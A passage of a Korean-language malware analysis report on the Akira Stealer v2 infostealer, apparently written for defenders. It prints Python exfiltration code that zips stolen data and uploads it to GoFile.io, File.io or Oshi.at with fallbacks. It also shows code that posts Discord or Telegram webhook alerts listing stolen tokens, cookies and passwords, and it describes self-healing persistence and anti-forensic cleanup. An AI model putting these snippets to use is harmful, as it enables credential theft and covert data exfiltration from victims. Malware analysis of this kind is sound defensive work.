zip_path\n",[550,10047,10048,10053,10057,10062,10067,10072,10077,10082,10087,10092,10097,10102,10107],{"__ignoreMap":593},[1679,10049,10050],{"class":1681,"line":1682},[1679,10051,10052],{},"import zipfile, datetime\n",[1679,10054,10055],{"class":1681,"line":2059},[1679,10056,3845],{"emptyLinePlaceholder":325},[1679,10058,10059],{"class":1681,"line":2065},[1679,10060,10061],{},"def create_archive(root_dir: str) -> str:\n",[1679,10063,10064],{"class":1681,"line":2071},[1679,10065,10066],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[1679,10068,10069],{"class":1681,"line":2393},[1679,10070,10071],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[1679,10073,10074],{"class":1681,"line":2399},[1679,10075,10076],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[1679,10078,10079],{"class":1681,"line":3055},[1679,10080,10081],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[1679,10083,10084],{"class":1681,"line":3848},[1679,10085,10086],{},"        for dirpath, _, files in os.walk(root_dir):\n",[1679,10088,10089],{"class":1681,"line":3854},[1679,10090,10091],{},"            for fname in files:\n",[1679,10093,10094],{"class":1681,"line":4103},[1679,10095,10096],{},"                full = os.path.join(dirpath, fname)\n",[1679,10098,10099],{"class":1681,"line":5028},[1679,10100,10101],{},"                rel = os.path.relpath(full, root_dir)\n",[1679,10103,10104],{"class":1681,"line":5034},[1679,10105,10106],{},"                zf.write(full, rel)\n",[1679,10108,10109],{"class":1681,"line":5040},[1679,10110,10111],{},"    return zip_path\n",[603,10113,10114],{},[606,10115,10116,10117,10120],{},"호스트 일관성을 위해 아카이브는 ",[550,10118,10119],{},"DESKTOP1234_20250505T123456Z.zip","으로 명명됩니다.",[532,10122,10123],{},[539,10124,10125],{},"ZIP 파일명 규칙",[532,10127,10128],{},"아카이브는 침해된 호스트의 컴퓨터 이름 뒤에 ISO 형식의 UTC 타임스탬프를 붙여 명명되어, 고유성과 시간순을 보장합니다.",[587,10130,10132],{"className":4489,"code":10131,"language":4491,"meta":593,"style":593},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[550,10133,10134,10139,10143,10147,10152,10156,10161,10165,10169],{"__ignoreMap":593},[1679,10135,10136],{"class":1681,"line":1682},[1679,10137,10138],{},"import datetime, os\n",[1679,10140,10141],{"class":1681,"line":2059},[1679,10142,3845],{"emptyLinePlaceholder":325},[1679,10144,10145],{"class":1681,"line":2065},[1679,10146,10061],{},[1679,10148,10149],{"class":1681,"line":2071},[1679,10150,10151],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[1679,10153,10154],{"class":1681,"line":2393},[1679,10155,10066],{},[1679,10157,10158],{"class":1681,"line":2399},[1679,10159,10160],{},"    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[1679,10162,10163],{"class":1681,"line":3055},[1679,10164,10071],{},[1679,10166,10167],{"class":1681,"line":3848},[1679,10168,10076],{},[1679,10170,10171],{"class":1681,"line":3854},[1679,10172,10111],{},[532,10174,10128],{},[861,10176,10178],{"id":10177},"_7144-업로드-워크플로","7.14.4 업로드 워크플로",[532,10180,867],{},[532,10182,10183],{},"Akira는 데이터 유출 성공 가능성을 극대화하기 위해 3계층 업로드 전략을 사용합니다. 먼저 GoFile.io의 퍼블릭 API를 사용해 아카이브를 업로드하려 시도하며, 이는 다운로드 링크를 반환합니다. GoFile을 사용할 수 없거나 차단된 경우, File.io로, 그다음 Oshi.at으로 되돌아가 데이터가 항상 전송되도록 보장합니다. 이 서비스들은 익명의 단기 호스팅을 제공하여, 테이크다운과 추적을 어렵게 만듭니다. 스크립트는 최종 다운로드 URL을 캡처하여 웹훅 전달을 위해 준비합니다.",[2079,10185,10186,10218,10246],{},[606,10187,10188,10191],{},[539,10189,10190],{},"기본: GoFile.io",[603,10192,10193,10201,10209],{},[606,10194,10195,974,10198],{},[539,10196,10197],{},"서버를 가져오는 API",[550,10199,10200],{},"GET https://api.gofile.io/servers",[606,10202,10203,974,10206],{},[539,10204,10205],{},"업로드 엔드포인트",[550,10207,10208],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[606,10210,10211,974,10214,10217],{},[539,10212,10213],{},"응답 필드",[550,10215,10216],{},"data.downloadPage","에 최종 URL이 담깁니다.",[606,10219,10220,10223],{},[539,10221,10222],{},"대체 #1: File.io",[603,10224,10225,10236],{},[606,10226,10227,974,10229,619,10232,10235],{},[539,10228,10205],{},[550,10230,10231],{},"POST https://file.io/",[550,10233,10234],{},"files={'file': open(...)}"," 사용",[606,10237,10238,10241,10242,10245],{},[539,10239,10240],{},"응답",": JSON ",[550,10243,10244],{},"link"," 필드.",[606,10247,10248,10251],{},[539,10249,10250],{},"대체 #2: Oshi.at",[603,10252,10253,10268],{},[606,10254,10255,974,10257,619,10260,10263,10264,10267],{},[539,10256,10205],{},[550,10258,10259],{},"POST http://oshi.at/",[550,10261,10262],{},"files[]","와 매개변수 ",[550,10265,10266],{},"expire=43200, autodestroy=0"," 사용.",[606,10269,10270,974,10272,10275],{},[539,10271,10240],{},[550,10273,10274],{},"DL: \u003Curl>","을 담은 평문.",[532,10277,10278],{},[539,10279,10280],{},"구현 스니펫:",[587,10282,10284],{"className":4489,"code":10283,"language":4491,"meta":593,"style":593},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[550,10285,10286,10291,10295,10300,10305,10309,10314,10319,10324,10329,10334,10339,10344,10349,10354,10359,10364,10368,10373,10378,10382,10387,10391,10396,10401,10405],{"__ignoreMap":593},[1679,10287,10288],{"class":1681,"line":1682},[1679,10289,10290],{},"import requests\n",[1679,10292,10293],{"class":1681,"line":2059},[1679,10294,3845],{"emptyLinePlaceholder":325},[1679,10296,10297],{"class":1681,"line":2065},[1679,10298,10299],{},"def upload_with_fallback(zip_path):\n",[1679,10301,10302],{"class":1681,"line":2071},[1679,10303,10304],{},"    # GoFile\n",[1679,10306,10307],{"class":1681,"line":2393},[1679,10308,5143],{},[1679,10310,10311],{"class":1681,"line":2399},[1679,10312,10313],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[1679,10315,10316],{"class":1681,"line":3055},[1679,10317,10318],{},"        for srv in servers:\n",[1679,10320,10321],{"class":1681,"line":3848},[1679,10322,10323],{},"            try:\n",[1679,10325,10326],{"class":1681,"line":3854},[1679,10327,10328],{},"                r = requests.post(\n",[1679,10330,10331],{"class":1681,"line":4103},[1679,10332,10333],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[1679,10335,10336],{"class":1681,"line":5028},[1679,10337,10338],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[1679,10340,10341],{"class":1681,"line":5034},[1679,10342,10343],{},"                url = r.json()['data']['downloadPage']\n",[1679,10345,10346],{"class":1681,"line":5040},[1679,10347,10348],{},"                if url: return url\n",[1679,10350,10351],{"class":1681,"line":5046},[1679,10352,10353],{},"            except: continue\n",[1679,10355,10356],{"class":1681,"line":5052},[1679,10357,10358],{},"    except: pass\n",[1679,10360,10361],{"class":1681,"line":5058},[1679,10362,10363],{},"    # File.io\n",[1679,10365,10366],{"class":1681,"line":5064},[1679,10367,5143],{},[1679,10369,10370],{"class":1681,"line":5070},[1679,10371,10372],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[1679,10374,10375],{"class":1681,"line":5076},[1679,10376,10377],{},"        return r.json().get('link','')\n",[1679,10379,10380],{"class":1681,"line":5082},[1679,10381,10358],{},[1679,10383,10384],{"class":1681,"line":5088},[1679,10385,10386],{},"    # Oshi.at\n",[1679,10388,10389],{"class":1681,"line":5094},[1679,10390,5143],{},[1679,10392,10393],{"class":1681,"line":5100},[1679,10394,10395],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[1679,10397,10398],{"class":1681,"line":5106},[1679,10399,10400],{},"        return text.split('DL: ')[1].strip()\n",[1679,10402,10403],{"class":1681,"line":5112},[1679,10404,10358],{},[1679,10406,10407],{"class":1681,"line":5778},[1679,10408,10409],{},"    return ''\n",[861,10411,10413],{"id":10412},"_7155-웹훅-알림-공격자-회수-및-분석가-가시성-한계","7.15.5 웹훅 알림, 공격자 회수 및 분석가 가시성 한계",[532,10415,867],{},[532,10417,10418],{},"ZIP 아카이브를 업로드한 후, Akira는 웹훅 알림(일반적으로 Discord 또는 Telegram으로)을 전송하며, 탈취된 토큰 수, 쿠키 수, 파일 크기, 클릭 가능한 다운로드 링크 같은 상세 정보를 담은 구조화된 임베드를 포함합니다. 이는 공격자에게 즉각적인 피드백과 회수 접근을 제공합니다. 신뢰성을 보장하기 위해, 아카이브 링크만 담은 평문 대체 메시지도 전송됩니다. 이 이중화는 임베드가 플랫폼에 의해 차단되거나 필터링되더라도 전달을 보장합니다. 방어자의 관점에서, 이러한 통신은 아웃바운드 네트워크 모니터링이 갖춰져 있지 않는 한 종종 보이지 않습니다.",[532,10420,10421],{},[539,10422,10423],{},"임베드 알림",[587,10425,10427],{"className":4489,"code":10426,"language":4491,"meta":593,"style":593},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[550,10428,10429,10434,10439,10444,10449,10454,10459,10464,10469,10473,10478,10483,10488,10492],{"__ignoreMap":593},[1679,10430,10431],{"class":1681,"line":1682},[1679,10432,10433],{},"# Build embed with key metadata\n",[1679,10435,10436],{"class":1681,"line":2059},[1679,10437,10438],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[1679,10440,10441],{"class":1681,"line":2065},[1679,10442,10443],{},"fields = [\n",[1679,10445,10446],{"class":1681,"line":2071},[1679,10447,10448],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[1679,10450,10451],{"class":1681,"line":2393},[1679,10452,10453],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[1679,10455,10456],{"class":1681,"line":2399},[1679,10457,10458],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[1679,10460,10461],{"class":1681,"line":3055},[1679,10462,10463],{},"    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[1679,10465,10466],{"class":1681,"line":3848},[1679,10467,10468],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[1679,10470,10471],{"class":1681,"line":3854},[1679,10472,7921],{},[1679,10474,10475],{"class":1681,"line":4103},[1679,10476,10477],{},"payload = {\n",[1679,10479,10480],{"class":1681,"line":5028},[1679,10481,10482],{},"    'username':'Akira 💊',\n",[1679,10484,10485],{"class":1681,"line":5034},[1679,10486,10487],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[1679,10489,10490],{"class":1681,"line":5040},[1679,10491,2402],{},[1679,10493,10494],{"class":1681,"line":5046},[1679,10495,10496],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[603,10498,10499,10505],{},[606,10500,10501,10504],{},[539,10502,10503],{},"전달",": 공격자의 Discord/Telegram 채널로 전송됩니다.",[606,10506,10507,10510,10511,10514],{},[539,10508,10509],{},"임베드 링크",": GoFile(또는 대체 호스트)의 ZIP을 가리키는 클릭 가능한 ",[550,10512,10513],{},"download_url","을 담습니다.",[532,10516,10517],{},[539,10518,10519],{},"원시 링크 대체",[587,10521,10523],{"className":4489,"code":10522,"language":4491,"meta":593,"style":593},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[550,10524,10525,10530,10535],{"__ignoreMap":593},[1679,10526,10527],{"class":1681,"line":1682},[1679,10528,10529],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[1679,10531,10532],{"class":1681,"line":2059},[1679,10533,10534],{},"message = f\"📥 Archive available at: {download_url}\"\n",[1679,10536,10537],{"class":1681,"line":2065},[1679,10538,10539],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[603,10541,10542],{},[606,10543,10544,10547],{},[539,10545,10546],{},"평문",": 임베드가 차단되거나 조용히 폐기될 경우를 대비해 링크 전달을 보장합니다.",[532,10549,10550],{},[539,10551,10552],{},"공격자가 링크를 회수하는 방법",[532,10554,10555,10558],{},[539,10556,10557],{},"1. 웹훅 인프라","\n공격자는 멀웨어 구성에 웹훅 엔드포인트를 삽입합니다:",[587,10560,10562],{"className":4489,"code":10561,"language":4491,"meta":593,"style":593},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[550,10563,10564,10569],{"__ignoreMap":593},[1679,10565,10566],{"class":1681,"line":1682},[1679,10567,10568],{},"# at class initialization\n",[1679,10570,10571],{"class":1681,"line":2059},[1679,10572,10573],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[603,10575,10576,10583],{},[606,10577,10578,974,10580],{},[539,10579,1317],{},[550,10581,10582],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[606,10584,10585,974,10588],{},[539,10586,10587],{},"Telegram",[550,10589,10590],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[532,10592,10593,10596],{},[539,10594,10595],{},"2. 실시간 전달","\n파일 업로드 성공 직후, 멀웨어는 다음을 실행합니다:",[587,10598,10600],{"className":4489,"code":10599,"language":4491,"meta":593,"style":593},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[550,10601,10602,10606,10611,10616,10621,10626,10631,10636,10641,10645,10650],{"__ignoreMap":593},[1679,10603,10604],{"class":1681,"line":1682},[1679,10605,10477],{},[1679,10607,10608],{"class":1681,"line":2059},[1679,10609,10610],{},"  'username': 'Akira 💊',\n",[1679,10612,10613],{"class":1681,"line":2065},[1679,10614,10615],{},"  'embeds': [{\n",[1679,10617,10618],{"class":1681,"line":2071},[1679,10619,10620],{},"      'title': '🗄️ Exfiltration Complete',\n",[1679,10622,10623],{"class":1681,"line":2393},[1679,10624,10625],{},"      'fields': [\n",[1679,10627,10628],{"class":1681,"line":2399},[1679,10629,10630],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[1679,10632,10633],{"class":1681,"line":3055},[1679,10634,10635],{},"      ]\n",[1679,10637,10638],{"class":1681,"line":3848},[1679,10639,10640],{},"  }]\n",[1679,10642,10643],{"class":1681,"line":3854},[1679,10644,2402],{},[1679,10646,10647],{"class":1681,"line":4103},[1679,10648,10649],{},"# Transmit the archive URL entirely in the JSON body\n",[1679,10651,10652],{"class":1681,"line":5028},[1679,10653,10654],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[603,10656,10657,10666],{},[606,10658,10659,10661,10662,10665],{},[550,10660,10513],{}," 변수가 임베드의 ",[550,10663,10664],{},"fields.value","에 보간됩니다.",[606,10667,10668,10669,10671,10672,10675],{},"Telegram 대체의 경우, ",[550,10670,10513],{},"이 평문 ",[550,10673,10674],{},"message"," 매개변수에 나타납니다.",[532,10677,10678],{},[539,10679,10680],{},"3. EDR 및 포렌식 가시성 한계",[603,10682,10683,10692],{},[606,10684,10685,10688,10689,10691],{},[539,10686,10687],{},"로컬 로깅 없음",": 멀웨어는 ",[550,10690,10513],{},"을 디스크나 시스템 로그에 기록하지 않습니다.",[606,10693,10694,10697],{},[539,10695,10696],{},"EDR 사각지대",": Microsoft Defender for Endpoint 같은 도구는 HTTP 요청 시도를 플래그할 수 있지만 삽입된 URL을 추출할 수는 없습니다.",[532,10699,10700],{},[539,10701,10702],{},"4. 분석가가 이를 로컬에서 복구할 수 없는 이유:",[603,10704,10705,10716,10736],{},[606,10706,10707,10688,10710,10712,10713,2121],{},[539,10708,10709],{},"링크의 로컬 사본 없음",[550,10711,10513],{},"을 메모리에만 기록하고 네트워크를 통해 전송합니다. 이 URL을 디스크나 로그에 저장하지 ",[4626,10714,10715],{},"않습니다",[606,10717,10718,10721,10722,10724,10729,10730,10732,10735],{},[539,10719,10720],{},"일시적 스테이징 정리",": 업로드 직후, 코드는 다음을 실행합니다:",[696,10723],{},[1679,10725,10728],{"className":10726},[10727],"text-monospace","shutil.rmtree(ROOT)",",",[696,10731],{},[550,10733,10734],{},"%TEMP%","에서 스테이징된 모든 아티팩트(모든 임시 텍스트 파일 포함)를 지웁니다.",[606,10737,10738,10741,10742,10745],{},[539,10739,10740],{},"네트워크 전용 전송",": 웹훅 호출(",[550,10743,10744],{},"requests.post",")은 메모리에서 발생합니다. 피해자 머신에는 HTTP 로그나 브라우저 기록 항목이 생성되지 않습니다.",[820,10747,10748],{},[532,10749,10750,10753,10754,10756,10757,10759],{},[539,10751,10752],{},"분석가에 대한 함의:","\n실행 시점에 라이브 패킷 캡처(예: 네트워크 TAP 또는 프록시)가 없으면, 정확한 ",[550,10755,10513],{},"은 감염 후 복구 불가능합니다.\n또한 유출된 아카이브는 호스팅 서비스에서 자동 삭제되어, 포렌식 회수의 여지를 더욱 줄입니다.\n감염 후 이미징이나 호스트 기반 포렌식 복구로도 공격자의 URL이나 파일 호스트 자격 증명은 드러나지 ",[4626,10758,10715],{},". 로컬에 아티팩트가 남아 있지 않기 때문입니다.",[826,10761],{"className":10762},[829,830],[713,10764,10766],{"id":10765},"_713-결론","7.13 결론",[532,10768,719],{},[532,10770,10771,10773],{},[550,10772,584],{},"(Akira Stealer v2)는 포괄적이고 상업적으로 배포되는 스틸러 툴킷입니다. 광범위한 표적화, 정교한 분석 방해, 동적 인프라 제어, 그리고 자격 증명, 암호화폐, 시스템 프로파일링, 사용자 파일 전반에 걸친 풀스택 데이터 탈취를 결합합니다. 그 모듈성과 은닉성은 신속한 재감염 방법과 결합되어, 실제 활동 중 관찰된 스틸러 중 기술적으로 가장 발전된 것 중 하나로 만듭니다.",[528,10775,10777],{"id":10776},"_8-순환-실행-체인-자가-치유-루프","8. 순환 실행 체인: 자가 치유 루프",[532,10779,534],{},[532,10781,10782,10783,10786],{},"이 캠페인에서 기술적으로 가장 정교한 요소 중 하나는 그 재생적이고 순환적인 실행 모델입니다. 드로퍼에서 페이로드로 흐른 뒤 사라지는 선형 단계를 가진 기존 멀웨어와 달리, 이 작전은 모든 구성 요소가 서로를 감시하는 ",[539,10784,10785],{},"폐쇄 루프","처럼 설계되었습니다.",[532,10788,4662,10789,10792],{},[539,10790,10791],{},"자가 치유 아키텍처","는 감염 체인을 지속적일 뿐만 아니라 자율적으로 만들었습니다. 부분적 제거로부터 완전히 복구할 수 있었습니다. 한 조각이라도 살아 있는 한, 전체 멀웨어 생태계는 스스로를 재조립할 수 있었습니다.",[713,10794,10796],{"id":10795},"_81-행위-분해","8.1 행위 분해",[532,10798,719],{},[2079,10800,10801,10827,10840,10869,10886],{},[606,10802,10803,10808,10810,10811,10814,10815,10817,10818,10820,10821,10823,10824,10826],{},[539,10804,10805,10806,2013],{},"지속성 앵커(",[550,10807,573],{},[550,10809,573],{},"는 기초적인 발판 역할을 합니다. 일반적으로 ",[550,10812,10813],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"," 같은 Windows 사용자 시작 위치에 드롭되거나 ",[550,10816,1651],{},"을 통해 등록됩니다. 그 임무는 단순하지만 중요합니다. ",[550,10819,577],{},"가 존재하도록 보장하고 사용자 로그온 중 이를 조용히 실행하는 것입니다. ",[550,10822,577],{},"가 없으면, 아카이브 ",[550,10825,1819],{},"(임시 폴더에 위치하거나 새로 드롭됨)를 다시 추출하여 전체 Electron 앱 구조를 재생성합니다.",[606,10828,10829,10834,10836,10837,10839],{},[539,10830,10831,10832,2013],{},"브리지 로더(",[550,10833,577],{},[550,10835,577],{},"는 Electron으로 래핑된 Node.js 애플리케이션입니다. 어떤 GUI도 노출하지 않고 완전히 백그라운드에서 작동합니다. 실행 시, Node.js를 런타임 환경으로 사용하여 ",[550,10838,1048],{}," 내에 삽입된 JavaScript 로직을 실행합니다. 이 추상화 계층은 핵심 로직을 PE 스텁에서 분리하여 전통적인 분석을 회피하는 데 도움을 줍니다.",[606,10841,10842,10847,10849,10850],{},[539,10843,10844,10845,2013],{},"실행 오케스트레이터(",[550,10846,2804],{},[550,10848,1048],{}," 안에 삽입된 이것이 감염 체인의 진정한 컨트롤러입니다. 그 핵심 기능은 다음과 같습니다:",[603,10851,10852,10857,10860],{},[606,10853,10854,10856],{},[550,10855,573],{},"의 존재를 확인하고 없으면 재배포",[606,10858,10859],{},"런타임 구성을 동적으로 주입: 웹훅 URL, C2 주소, 토큰",[606,10861,10862,10863,10865,10866,10868],{},"이미 존재하는 Python 페이로드(",[550,10864,584],{},")를 호출하거나, 공격자가 통제하는 인프라에서 ZIP 번들(예: ",[550,10867,2869],{},")의 일부로 이를 다운로드",[606,10870,10871,10876,10877,1538,10879,10881,10882,10885],{},[539,10872,10873,10874,2013],{},"페이로드 실행(",[550,10875,584],{},"\n트리거되면, ",[550,10878,584],{},[550,10880,552],{},"를 통해 메모리에서 실행됩니다. 저장된 자격 증명, 쿠키, Discord 토큰, 브라우저 세션 데이터, 암호화폐 지갑 확장을 체계적으로 수집합니다. 데이터는 ZIP 아카이브에 스테이징되어 HTTPS를 통해 유출됩니다. 일반적으로 Discord 웹훅으로 향하지만, ",[550,10883,10884],{},"gofile.io"," 같은 대체 API나 맞춤 C2 엔드포인트도 관찰되었습니다.",[606,10887,10888,10891,10892,10894,10895,10897,10898,1265,10900,10902,10903,10905],{},[539,10889,10890],{},"루프 무결성 및 자가 치유","\n설계는 순환적입니다. ",[550,10893,573],{},"가 삭제되면 재배포됩니다. ",[550,10896,577],{},"가 없으면 ",[550,10899,573],{},[550,10901,1819],{},"에서 이를 다시 추출합니다. ",[550,10904,584],{},"가 삭제되면 JavaScript 계층이 이를 다시 확보합니다. 이 상호 의존성은 멀웨어를 복원력 있게 만들고, 사실상 살아남은 어떤 조각으로부터도 실행 체인을 재구성할 수 있게 합니다.",[532,10907,10908,10909,10912],{},"이 아키텍처는 단지 모듈형인 것이 아니라 ",[539,10910,10911],{},"자기 지속적","이며, 표적 환경에서의 은닉성, 유연성, 장기 생존성을 위해 의도적으로 설계되었습니다.",[713,10914,10916],{"id":10915},"_82-이것이-주목할-만한-이유","8.2 이것이 주목할 만한 이유",[532,10918,719],{},[532,10920,10921,10922,10925],{},"이 캠페인의 아키텍처 설계는 상용 인포스틸러에서 일반적으로 보이지 않는 수준의 정교함을 반영합니다. 단순한 다단계 로더를 넘어, 이는 ",[539,10923,10924],{},"운영 복원력, 은닉성, 자동화","를 위해 설계된 멀웨어입니다.",[532,10927,10928],{},[539,10929,10930],{},"핵심 특성",[603,10932,10933,10939,10976,10996],{},[606,10934,10935,10938],{},[539,10936,10937],{},"완전한 자율성","\n일단 배포되면, 멀웨어는 사용자 상호작용이나 외부 재활성화가 필요 없습니다. 악성 마이크로서비스처럼 작동하며, 외부 통제 없이 자신의 지속성, 페이로드 실행, 복구 루틴을 스스로 오케스트레이션합니다.",[606,10940,10941,10944,10945],{},[539,10942,10943],{},"다중 언어 실행 스택","\n이 툴체인은 다음을 통합합니다:",[603,10946,10947,10956,10962,10968],{},[606,10948,10949,3193,10952,619,10954,2013],{},[539,10950,10951],{},"PE 바이너리",[550,10953,573],{},[550,10955,577],{},[606,10957,10958,10961],{},[539,10959,10960],{},"Node.js / JavaScript","(Electron을 통해)",[606,10963,10964,10967],{},[539,10965,10966],{},"PowerShell","(난독화된 페이로드 릴레이에 사용)",[606,10969,10970,3193,10973,10975],{},[539,10971,10972],{},"Python",[550,10974,584],{},", 메모리 상주 스틸러로 실행)\n이 계층화된 구성은 전통적인 정적 도구로 프로파일링하고, 지문 채취하고, 분석하기 더 어렵게 만듭니다.",[606,10977,10978,10981,10982],{},[539,10979,10980],{},"설계에 의한 방어 회피","\n모든 구성 요소가 인코딩되거나, 암호화되거나, 동적으로 주입됩니다:",[603,10983,10984,10987,10990,10993],{},[606,10985,10986],{},"Base64 PowerShell 릴레이",[606,10988,10989],{},"AES 암호화 및 GZIP 압축된 Python 코어",[606,10991,10992],{},"런타임 토큰 주입이 있는 난독화된 JavaScript",[606,10994,10995],{},"부분적 제거를 좌절시키는 자가 치유 동작",[606,10997,10998,11001,11002,11005,11006,11008,11009,11011],{},[539,10999,11000],{},"단일 장애점 없음","\n멀웨어의 자가 복구 로직은 ",[539,11003,11004],{},"단일 구성 요소의 제거로는 충분하지 않음","을 보장합니다. ",[550,11007,573],{},"가 제거되면, 인포스틸러가 이를 재생성합니다. ",[550,11010,584],{},"가 삭제되면, JavaScript 컨트롤러가 이를 다시 다운로드하고 재배포합니다.",[532,11013,11014,11015,11018],{},"요컨대, 이 멀웨어는 전형적인 페이로드보다 ",[539,11016,11017],{},"분산 시스템","처럼 동작합니다. 생존성, 모듈성, 은닉성을 우선하는 시스템입니다.",[532,11020,11021,11022,11025],{},"이는 위협을 기회주의적 공격에서 ",[539,11023,11024],{},"복원력 있고 적응적인 플랫폼","으로 격상시키며, 방어자가 동등하게 계층화된 탐지 및 대응 전략으로 그 복잡성에 맞설 것을 요구합니다.",[713,11027,11029],{"id":11028},"_83-블루팀에-대한-함의","8.3 블루팀에 대한 함의",[532,11031,719],{},[532,11033,11034],{},"방어자와 CSOC 운영자에게, 이런 종류의 아키텍처는 문턱을 높입니다:",[603,11036,11037,11043,11058],{},[606,11038,11039,11042],{},[539,11040,11041],{},"부분적 정리는 효과가 없습니다",". 모든 노드를 식별하고 동시에 제거해야 합니다.",[606,11044,11045,11048,11049,11051,11052,11051,11054,11051,11056,2121],{},[539,11046,11047],{},"Defender for Endpoint 상관 분석","이 필수적입니다. 분석가는 전체 체인을 추적해야 합니다. ",[550,11050,573],{}," → ",[550,11053,1102],{},[550,11055,1199],{},[550,11057,552],{},[606,11059,11060,11063],{},[539,11061,11062],{},"IOC 없는 지속성","은 메모리 기반 휴리스틱, 텔레메트리 기준선 설정, 체인 기반 탐지가 핵심임을 의미합니다.",[532,11065,11066,11067,11070],{},"이것은 단순한 스틸러가 아닙니다. ",[539,11068,11069],{},"복원력 있는 멀웨어 플랫폼","이며, 단순한 위협보다 분산 시스템처럼 동작합니다. 그리고 바로 그 점이 이를 인상적이면서도 위험하게 만듭니다.",[528,11072,11074],{"id":11073},"_9-블록체인-추적-및-분석","9. 블록체인 추적 및 분석",[532,11076,534],{},[713,11078,11080],{"id":11079},"_91-litecoin-기반-멀웨어-캠페인에서-자금-분배-추적","9.1 Litecoin 기반 멀웨어 캠페인에서 자금 분배 추적",[532,11082,719],{},[532,11084,11085,11086,11089],{},"이 멀웨어 캠페인의 리버스 엔지니어링 단계에서, 우리는 스틸러가 암호화폐 유출에 사용한 여러 하드코딩된 지갑 주소를 추출했습니다. 이 Litecoin 지갑들의 온체인 활동을 추적함으로써, 의도적인 자금 세탁 전술을 시사하는 패턴을 밝혀낼 수 있었습니다. 공격자가 통제하는 지갑 ",[550,11087,11088],{},"LW6EopiZ...","는 중앙 집계 지점 역할을 합니다. 여러 피해자에게서 탈취한 자금이 이 주소로 흘러들고, 이후 여러 새 주소로 빠르게 재분배됩니다.",[532,11091,11092],{},"여기서 보이는 동작은 암호화폐 텀블링이나 믹싱 작업에 사용되는 고전적인 분할 전송(split-transfer) 패턴을 대표합니다. 각 사례에서, 전체 수신 잔액은 대략 비례하는 두 개의 아웃바운드 거래로 나뉘어 각각 다른 지갑으로 전송됩니다. 이 전략은 자금의 출처를 난독화하여 주소 클러스터링과 체인 추적을 방해하도록 설계되었습니다. 자동화된 블록체인 분석 및 위협 인텔리전스 플랫폼에 의한 탐지를 회피하는 효과적인 전술입니다.",[532,11094,11095],{},"이 세탁 동작은 거래 타이밍, 정밀한 값 분할, 주소 재사용 최소화의 조합을 활용하여, GraphSense, Chainalysis, TRM Labs 등에서 사용하는 